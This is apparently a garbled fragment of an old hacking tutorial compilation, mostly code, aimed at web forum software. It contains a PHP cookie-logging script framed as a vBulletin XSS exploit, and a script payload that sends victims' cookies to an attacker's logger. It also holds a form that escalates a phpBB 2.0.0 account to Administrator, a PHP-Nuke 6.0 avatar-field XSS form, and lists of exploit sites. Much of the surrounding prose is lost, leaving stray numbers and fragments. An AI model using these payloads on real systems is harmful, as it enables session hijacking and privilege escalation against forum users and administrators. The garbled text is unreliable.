Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
/*
Print ($Footer);
*/
Switch ($HTTP_GET_VARS['Action']) {
Case "Log":
$Data = $HTTP_GET_VARS['Cookie'];
$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex (MD5 (NULL))))));
$Log = FOpen ($LogFile, "a+");
FWrite ($Log, Trim ($Data) . "\n");
FClose ($Log);
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
Case "List":
If (!File_Exists ($LogFile) || !In_Array ($Records)) {
Print ("<Br><Br><B>There are No Records</B></Center></Pre>");
Exit ();
}
Else {
Print ("</Center></Pre>");
$Records = Array_UniQue (File ($LogFile));
Print ("<Pre>");
Print ("<B>.:: Statics</B>\n");
Print ("\n");
Print ("o Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n");
Print ("o Listed Records : <B>" . Count ($Records) . " </B>[Not Counting Duplicates]\n");
Print ("\n");
Print ("<B>.:: Options</B>\n");
Print ("\n");
If (Count (File ($LogFile)) > 0) {
$Link['Download'] = "[<A Href=\"" . $LogFile . "\">Download</A>]";
}
Else {
$Link['Download'] = "[No Records in Log]";
}
Print ("o Download Log : " . $Link['Download'] . "\n");
Print ("o Clear Records : [<A Href=\"" . $SCRIPT_PATH. "?Action=Delete\">Y</A>]\n");
Print ("\n");
Print ("<B>.:: Records</B>\n");
Print ("\n");
While (List ($Line[0], $Line[1]) = Each ($Records)) {
Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
}
}
Print ("</Pre>");
Break;
Case "Delete":
@UnLink ($LogFile);
Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
}
?>
php -2
-3
member2.php?s=[Session]&action=viewsubscription&perpage=[Script Code]
[script code]

<Script>location='Http://[]/?Action=Log&Cookie='+(document.cookie);</Script>
-4
http://%20/?Action=List

321

" " phpbb 2.0.0


> <
phpbb 2.0.0
vb

PhpBB2
admin_ug_auth.php
:


:
2.0.0



<html>
<head>
</head>
<body>
<form method="post" action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>

http://www.domain_name/board_directory
html

Administrator

submit

!!


http://forums.xos.ca/
...

323

" " php nuke


> <
> : <
php nuke ..
.......
- -
!!!!
!!! !!!
.....
) : (
:
PHP Nuke versionh 6.0
324

:
.

:

.... images/forum/avatars/
..

text .. !!!!
:
Your Account
Your Info view source
uid
:
<input type="hidden" name="uid" value="2111">
... 2111
html
http://nukesite/ :......
<!-- START CODE -->
<form name="Register" action="http://NUKEDSITE/modules.php?name=Your_Account" method="post">
<b>Code ('">[code]<b ')</b><input type="text" name="user_avatar" size="30" maxlength="30"><br><br>
<b>Username</b><input type="text" name="uname" size="30" maxlength="255"><br><b>User ID:<input type="text" name="uid" size="30"><input type="hidden" name="op" value="saveuser"><input type="submit" value="Save Changes"></form>
<!-- END CODE -->

html ..
:
"<

>b
... submit
Your Account .. !!!!
:
"<>h1>TESTING</h1><b
TESTING !!....

">b
..
30 ....
xss
=(
:
!!!!
...

326

" "
:::

327

.1
.2
.3
.4
.5
.6
.7
.8
.9
.10
.11
.12
.13

...
.

" "

Packet Storm Security
--------------------- : http://packetstorm.securify.com/

' 'New Files Today
.
Ken Williams

(http://www.securify.com/) (Kroll-O-Nagra).
Security Focus
--------------- : http://www.securityfocus.com/
328

. !
BugTraq
------- : (Security Focus, http://www.securityfocus.com/),
(Netspace, http://www.netspace.org/).
BugTraq mailing list
Aleph1 (aleph1@underground.org).
) ( spams

http://www.securityfocus.com/

''search
Searching
----------- 'Sendmail 8.8.3'
'sendmail 8.8.3 local DoS'
sendmail
'local DoS sendmail' : .
:::
http://rootshell.redi.tk/
.1
http://www.ussrback.com
.2
http://www.insecure.org/sploits.html
.3
http://www.linux.com.cn/hack.co.za
.4
==+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


:::
http://www.haker.com.pl
.1
http://www.webattack.com/
.2
http://blacksun.box.sk
.3
http://www.blackcode.com
.4


http://www.t0010.com/books/index.php

329

330
